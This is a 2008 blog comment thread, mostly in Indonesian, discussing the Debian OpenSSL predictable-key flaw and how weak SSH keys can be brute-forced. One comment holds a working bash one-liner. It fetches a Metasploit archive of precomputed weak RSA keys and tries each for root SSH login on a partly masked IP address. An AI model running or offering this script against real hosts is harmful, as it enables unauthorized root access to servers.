Comments on: Brute the crypto library

By: degleng

degleng — Sun, 08 Jun 2008 05:55:38 +0000

nyemialan apa itu, kokor kokor aku, qe3

By: my own log » Blog Archive » Debian OpenSSL flaw

my own log » Blog Archive » Debian OpenSSL flaw — Thu, 05 Jun 2008 11:11:30 +0000

[...] ssh di debian dapat ditebak karena pembuatannya hanya berdasarkan PID. Lengkapnya silahkan lihat di sini. Untuk mencek apakah key dipakai itu adalah key yang lemah atau tidak bisa menggunakan tool yang [...]

By: SSH Geek

SSH Geek — Tue, 20 May 2008 18:59:18 +0000

wget http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2; tar jxvf debian_ssh_rsa_2048_x86.tar.bz2;ls rsa/2048/|grep -v pub > rsa.test;LIST=$(cat rsa.test);for FILE in $LIST;do echo Using private key $(pwd)/rsa/2048/$FILE;ssh -lroot -i $(pwd)/rsa/2048/$FILE -o PasswordAuthentication=no 222.124.xx.xx “pwd” > /dev/null 2>&1;if [ $? -eq 0 ];then echo $(tput setaf 1)Private key found : $(pwd)/rsa/2048/$FILE$(tput sgr0);echo Private key found : $(pwd)/rsa/2048/$FILE >> vulner.log;break;fi;done

By: staff

staff — Sat, 17 May 2008 11:42:53 +0000

hehe, yaph. absolutely right, my dear…

~ h3b

By: phoenix

phoenix — Sat, 17 May 2008 01:49:43 +0000

Hihi, iyhap kemaren salah baca reportnya , kmrn posting comment makanya saya unapprove/delete lagi coz pada saat yang sama saya membaca ulang reportnya ternyata yang di guesing private key-nya, saya kira tadinya password PEM untuk private keynya he3x, mungkin sebagai catatan kalo authorized_keys nya dikasi PEM password saat generate ssh-keygen PoC dari mueller metinya masih minta password lagi. Hanya saja kebanyakan orang menggunakan RSA authentikasi untuk bypass authentikasi password. Salam

By: wedew

wedew — Fri, 16 May 2008 17:01:18 +0000

^sumpehhh looo.. !?!

By: Cyberheb

Cyberheb — Fri, 16 May 2008 13:45:37 +0000

nah, itu dia yg jadi letak titik permasalahan hole ini, karena private key dari authorized_keys bisa di generate sendiri, itulah yang dilakukan oleh HDM, generate private key utk 1024 DSA, 2048 RSA dan 4096 RSA. Private key-private key tsb yang akan menjadi kamus data dalam proses brute force, dan jauh lbh sederhana krn openssl debian hanya menggunakan parameter PID utk seed dalam randomisasi, jd sebenarnya randomisasi tersebut bisa di anggap tidak random.

Selama target merupakan mesin debian, atau turunan debian, atau menggunakan authorized_keys yang digenerate oleh openssl debian based maka bisa di lakukan dari mesin manapun, tentu saja terkecuali ada mekanisme IPS

By: staff

staff — Fri, 16 May 2008 13:35:55 +0000

Author : SSH Geek

Comment:
anyway, itu proses authentikasi ssh berdasar authentikasi RSA/DSA kan yha?? artinya proses brute force hanya bisa dilakukan dari host yang memiliki private key dari authorized_keys yang ditaruh di server, bener ga?? He he he,,, jadi saya pikir PoC untuk kasus libssl pada openssh ini risknya low-medium saja karena tidak bisa dilakukan dari sembarang host